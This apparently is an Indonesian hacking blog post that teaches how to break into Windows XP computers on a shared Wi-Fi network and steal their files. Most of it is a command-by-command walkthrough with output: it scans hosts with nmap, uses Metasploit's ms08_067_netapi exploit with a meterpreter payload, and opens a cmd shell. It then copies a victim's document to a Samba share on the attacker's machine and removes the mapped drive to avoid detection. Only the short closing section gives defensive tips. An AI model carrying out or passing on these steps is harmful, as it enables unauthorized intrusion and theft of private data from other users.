My Sin Asshole

mau nyolong file atau ngacak" file orang lewat wifi, tapi tutor ini ane praktekin dengan target yang menggunakan wondows XP, untuk target windows 7 masih kuat firewallnya, port 445 ketutup men..
ane juga pake ubuntu 12.10, ga pake becktrack..

nah langsung aja men, pertama pastikan kalo ubutnu atau os linux kalian sudah terinstall metasploit sama nmap nya + samba untuk melakukan aksinya...

sekarang Cari target komputer yang sedang aktif online
terlebih dulu cari tau nomor IP DHCP yang kita dapat.

$ sudo ifconfig -a

lihat hasilnya :
eth1 Link encap:Ethernet HWaddr 00:50:BF:1B:B5:51
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255

brarti kita dapet IP 192.168.0.10

langsung scan komputer yang lagi online di area itu

$ nmap -sP 192.168.0.0/24

lihat hasilnya :
Host 192.168.0.1 appears to be up.
MAC Address: 00:B0:6C:EF:47:30 (Unknown)
Host arman (192.168.0.10) appears to be up.
Host 192.168.0.1 appears to be up.
MAC Address: 00:E0:4C:ED:41:20 (Unknown)
Host mycomp (192.168.0.11) appears to be up.
MAC Address: 00:E0:5C:FD:45:17 (Unknown)
dan seterusnya……………

OK pilih salah satu target (korban) yaitu : 192.168.0.11

Lakukan ping dulu ke IP korban. sapa tau sudah dipasang firewall

$ ping 192.168.0.11

Jika hasilnya reply maka siap melakukan langkah berikutnya
Scan port yang terbuka terlebih dahulu

$ nmap 192.168.0.11

lihat hasilnya:
PORT STATE SERVICE
139/tcp open nb-session
445/tcp open microsoft-ds
8080/tcp open http-proxy

OK port 445 terbuka dan sasaran empuk untuk menyusup kesana
lakukan urutan exploitasi berikut:
Jalankan metasploit

$ msfconsole

Pilih jenis tools untuk exploit

msf> use windows/smb/ms08_067_netapi

Pilih metode penyerangan

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

Tambahkan target IP korban

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.11

Langsung lakukan exploit

msf exploit(ms08_067_netapi) > exploit

jika muncul prompt dibawah ini brarti serangan berhasil
meterpreter>

Eiits tunggu dulu ente belum menguasai komputer korban sepenuhnya
Tinggal satu perintah lagi, setelah itu baru bisa diapa-apain.

 meterpreter> execute -M -f cmd.exe -i

lihat hasilnya :
C:\Windows\System32>

nah kita sudah masuk sepenuhnya… mau diapain nih?
jangan dirusak lah kasihan..
kita copy aja datanya ke komputer kita
barangkali ada surat rahasia atau data korupsi hehehe..

OK persiapan untuk copy data
Pastikan Linux kita sudah ada samba dan service sudah started
Sharinglah sebuah folder di linux kita dengan permission read and write
jangan lupa juga :

$ sudo chmod 777 nama-folder

disini saya kasih contoh nama folder saya “MySin”

OK Kembali ke komputer korban (target)
cari dulu data yang dianggap penting..
biasanya ditaruh di D:\ atau di My Documents
misalnya data yang kita incar ada di D:\ maka lakukan perintah berikut :

C:\Windows\System32>D:

D:\>dir

05/25/2010 10:57 PM 22.700 rahasia.doc

Nah tuh ada file bernama “rahasia.doc”

selanjutnya kita buat mapping drive ke komputer kita

D:\>net use Z: \\192.168.0.10\MySin

OK tinggal copy file “rahasia.doc” ke drive Z: yang sebenarnya adalah komputer kita

D:\>copy rahasia.doc Z:
segera tutup drive Z: agar ga ketahuan oleh korban

D:\>net use /delete Z:

OK aman
Silahkan buka file “rahasia.doc” di folder “MySin” menggunakan openoffice
Gampang kan..

Nah seperti etika hacking yang ada pada umumnya
kita bukan hanya memberi cara menerobos tapi juga cara mengamankannya
Yang pertama Ane saranin pakailah Linux hehehe
kalo ente terpaksa pake windows maka:
download worm cleaner di Windows Worms Doors Cleaner 1.4.1

lalu buka file tersebut maka otomatis akan menutup port 445
jika ingin membuka lagi port tersebut cukup klik tombol enabled
Jangan lupa aktifkan firewall ente.
cukup dulu yah...
see youu